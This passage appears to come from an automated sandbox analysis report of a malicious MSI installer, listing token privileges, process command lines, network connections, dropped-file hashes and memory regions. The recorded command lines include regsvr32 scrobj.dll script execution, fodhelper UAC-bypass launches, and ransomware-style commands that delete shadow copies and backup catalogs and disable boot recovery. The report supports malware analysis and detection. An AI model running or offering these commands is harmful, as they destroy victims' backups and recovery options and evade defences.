| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\d1d4e29f5fca0c97cd89a4b5134d298.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:3
C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding DA9A8780BF4B97A9F3A263667738C433
C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
C:\Windows\System32\cmd.exe
cmd /c "start microsoft-edge:http://2650bac8b4tjtwhzx.lowso.info/tjtwhzx^&1^&31382858^&57^&333^&2219041
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://2650bac8b4tjtwhzx.lowso.info/tjtwhzx&1&31382858&57&333&2219041
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffc054b46f8,0x7ffc054b4708,0x7ffc054b4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
C:\Windows\system32\fodhelper.exe
fodhelper.exe
C:\Windows\system32\fodhelper.exe
fodhelper.exe
C:\Windows\system32\fodhelper.exe
fodhelper.exe
C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5292 /prefetch:8
C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete catalog -quiet
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete catalog -quiet
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
C:\Windows\system32\fodhelper.exe
fodhelper.exe
C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
C:\Windows\system32\fodhelper.exe
fodhelper.exe
C:\Windows\system32\fodhelper.exe
fodhelper.exe
C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete catalog -quiet
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete catalog -quiet
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete catalog -quiet
C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff79fda5460,0x7ff79fda5470,0x7ff79fda5480
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4388 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4120 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5272 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4412 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6004 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| IE | 20.67.219.150:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | smartscreen-prod.microsoft.com | udp |
| IE | 20.67.219.150:443 | smartscreen-prod.microsoft.com | tcp |
| IE | 20.67.219.150:443 | smartscreen-prod.microsoft.com | tcp |
| IE | 20.67.219.150:443 | smartscreen-prod.microsoft.com | tcp |
| US | 8.8.8.8:53 | 2650bac8b4tjtwhzx.lowso.info | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| FR | 107.191.47.239:80 | 2650bac8b4tjtwhzx.lowso.info | tcp |
| FR | 107.191.47.239:80 | 2650bac8b4tjtwhzx.lowso.info | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| IE | 20.82.250.189:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| US | 204.79.197.203:443 | tcp | |
| NL | 23.73.0.149:443 | tcp | |
| NL | 23.73.0.149:443 | tcp | |
| NL | 23.73.0.149:443 | tcp | |
| US | 204.79.197.203:443 | tcp | |
| FR | 2.22.22.80:443 | tcp | |
| IE | 52.142.114.2:443 | tcp | |
| NL | 52.222.137.12:443 | tcp | |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 204.79.197.219:443 | tcp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.203:443 | api.msn.com | tcp |
| US | 204.79.197.219:443 | tcp | |
| US | 13.107.40.203:443 | tcp | |
| NL | 104.109.143.4:443 | tcp | |
| US | 204.79.197.219:443 | tcp | |
| US | 8.8.8.8:53 | dns.google | udp |
| NL | 104.109.143.13:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
Files
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
| MD5 | 90df6282d1487b0ee4da15aa05ad3262 |
| SHA1 | 3aa55805cb269aec509ae5cdc05018fd250aca56 |
| SHA256 | 6c827f8a24f5cac278dc138835a8b2bfe6c512654fc02a10c8b1b77a0a7e8adc |
| SHA512 | 0d92f27f1e9c184cdd2d4bdf8f022f068ad3369296dc313ec2a80e3b8b98b4f81cdff482ad0a8d3301b56d4fdeaff5bc207ac197886f7227bd131001d84ff965 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
| MD5 | 0ef37fe40a2f1ff9306c64f04561091a |
| SHA1 | b366a393b0a7dbf7903e80c6ad9360731047b1df |
| SHA256 | 463372f0275936a564f1e12020b8fd1dabd016e3c3d57093a0f8294ba9874324 |
| SHA512 | 98f60fe149e8be418864fe0ad88c4057e9a03ec39243beda82cba09521f867b3f116b2bbb863c538e079aff2b5c73a995a6080128f7c108f075fa89cc55656d6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
| MD5 | dee06844fce8429dc201e12fff4ce3f8 |
| SHA1 | 44a8dba49bbb4e801a62fb688f3d49603822c7ab |
| SHA256 | fe31e3a5954946ae22ee80d044c59ebaf94dfede793047dccc482eac8614ac01 |
| SHA512 | db63b43fc1a9cbf242864f87300e714f65bab11e1368de55327970678cf2e532dfad8f5b960922d747b59263a2466b768292204c6f487cacf448e3d0883ae3c4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
| MD5 | 574cb0f2bd1e6a96f2a34169659a974d |
| SHA1 | fbf306c1842524fa1f5db4f3fb7e99eeab1c7614 |
| SHA256 | aea7968dce66d2ea295405220248cc04dee30a753785da54f8d61b89f7a2c236 |
| SHA512 | 15a44bd88e8b303927128f337e4c9933a6922900d65ff997cba1deb4791ae88978df0ad488291ad04c40128a94e2ee40c86496e21723d712653e252ed21b3784 |
C:\Windows\Installer\MSIC83F.tmp
| MD5 | 07944a97980bedc3b5864181bc59fc94 |
| SHA1 | a2bd9be4dd395eb7d2558f4de1fff1bbbb0ecd25 |
| SHA256 | 10f0b697db8d2f044954625f99eeafef1fb8c9acff0678171c2f9536f1d7a3ab |
| SHA512 | aeb62b32e82726df6cac9e79912d1cf9a2d83280b603e1a6a53ce39c66c66192d1d18256c29cd0041b6e1188796f6faab290a3fd708b85d5c2d6e45ec952a73a |
C:\Windows\Installer\MSIC83F.tmp
| MD5 | 07944a97980bedc3b5864181bc59fc94 |
| SHA1 | a2bd9be4dd395eb7d2558f4de1fff1bbbb0ecd25 |
| SHA256 | 10f0b697db8d2f044954625f99eeafef1fb8c9acff0678171c2f9536f1d7a3ab |
| SHA512 | aeb62b32e82726df6cac9e79912d1cf9a2d83280b603e1a6a53ce39c66c66192d1d18256c29cd0041b6e1188796f6faab290a3fd708b85d5c2d6e45ec952a73a |
C:\Users\Public\w8q31a55
| MD5 | 413c537a29057c20d16dbfc3d1b98bec |
| SHA1 | a478c3e5ca2409704bef0ab7784e24061924d2eb |
| SHA256 | b25f851e1dd7c3fc5a9c5d7988f97df322842ff070e5c7d3cec2f2d96fd2652f |
| SHA512 | b560e879328ac19c718517e4d217566d7f1b42136b1cf1c106333a494b94dd615084920d0c43aebf380da2b53220d6fff9fd0e1ecb32903f08cb8af6ad923ab8 |
C:\Users\Public\bjsocea
| MD5 | e65567105c52271e701dba875ff9b334 |
| SHA1 | a2103b64c96300518aa8c00b99555a5932ef2d4c |
| SHA256 | 7ce34482f025436b54ba2690698d2d4406ff08fbf8de61fc1ee2cadc4bff608b |
| SHA512 | 9c6a1186bf1d31c883cd977fb3c64cdb82de432a2f03c89449489613d65a994f1d757c3ddd9648693d527e5e42483afc6fae1b1fea0e6cf77f34d921d33e0303 |
C:\Users\Public\w8q31a55
| MD5 | 413c537a29057c20d16dbfc3d1b98bec |
| SHA1 | a478c3e5ca2409704bef0ab7784e24061924d2eb |
| SHA256 | b25f851e1dd7c3fc5a9c5d7988f97df322842ff070e5c7d3cec2f2d96fd2652f |
| SHA512 | b560e879328ac19c718517e4d217566d7f1b42136b1cf1c106333a494b94dd615084920d0c43aebf380da2b53220d6fff9fd0e1ecb32903f08cb8af6ad923ab8 |
C:\Users\Public\bjsocea
| MD5 | e65567105c52271e701dba875ff9b334 |
| SHA1 | a2103b64c96300518aa8c00b99555a5932ef2d4c |
| SHA256 | 7ce34482f025436b54ba2690698d2d4406ff08fbf8de61fc1ee2cadc4bff608b |
| SHA512 | 9c6a1186bf1d31c883cd977fb3c64cdb82de432a2f03c89449489613d65a994f1d757c3ddd9648693d527e5e42483afc6fae1b1fea0e6cf77f34d921d33e0303 |
C:\Users\Public\bjsocea
| MD5 | e65567105c52271e701dba875ff9b334 |
| SHA1 | a2103b64c96300518aa8c00b99555a5932ef2d4c |
| SHA256 | 7ce34482f025436b54ba2690698d2d4406ff08fbf8de61fc1ee2cadc4bff608b |
| SHA512 | 9c6a1186bf1d31c883cd977fb3c64cdb82de432a2f03c89449489613d65a994f1d757c3ddd9648693d527e5e42483afc6fae1b1fea0e6cf77f34d921d33e0303 |
memory/4028-141-0x0000021A06200000-0x0000021A0620D000-memory.dmp
memory/4028-142-0x0000021A07370000-0x0000021A07371000-memory.dmp
memory/4028-144-0x0000021A06220000-0x0000021A06221000-memory.dmp
memory/4028-143-0x0000021A073A0000-0x0000021A073A1000-memory.dmp
memory/4028-145-0x0000021A07A40000-0x0000021A07A41000-memory.dmp
memory/4028-147-0x0000021A06210000-0x0000021A06211000-memory.dmp
memory/4028-146-0x0000021A0A1A0000-0x0000021A0A1A1000-memory.dmp
memory/4028-148-0x0000021A0B1F0000-0x0000021A0B1F1000-memory.dmp
memory/4028-150-0x0000021A06250000-0x0000021A06251000-memory.dmp
memory/4028-149-0x0000021A0B230000-0x0000021A0B231000-memory.dmp
memory/4028-151-0x0000021A06520000-0x0000021A06521000-memory.dmp
memory/4028-152-0x0000021A06530000-0x0000021A06531000-memory.dmp
memory/4028-154-0x0000021A06570000-0x0000021A06571000-memory.dmp
memory/4028-155-0x0000021A06580000-0x0000021A06581000-memory.dmp
memory/4028-153-0x0000021A06540000-0x0000021A06541000-memory.dmp
memory/4028-157-0x0000021A065A0000-0x0000021A065A1000-memory.dmp
memory/2316-158-0x000002053C8B0000-0x000002053C8B3000-memory.dmp
memory/4028-156-0x0000021A06590000-0x0000021A06591000-memory.dmp
memory/4028-160-0x0000021A06740000-0x0000021A06741000-memory.dmp
memory/4028-159-0x0000021A06730000-0x0000021A06731000-memory.dmp
memory/4028-161-0x0000021A07130000-0x0000021A07131000-memory.dmp
memory/4028-162-0x0000021A07070000-0x0000021A07071000-memory.dmp
memory/2472-163-0x0000025036B40000-0x0000025036B41000-memory.dmp
memory/4988-165-0x00007FFC276E0000-0x00007FFC276E1000-memory.dmp
\??\pipe\LOCAL\crashpad_4436_DOOSYIDODVSTJQUD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
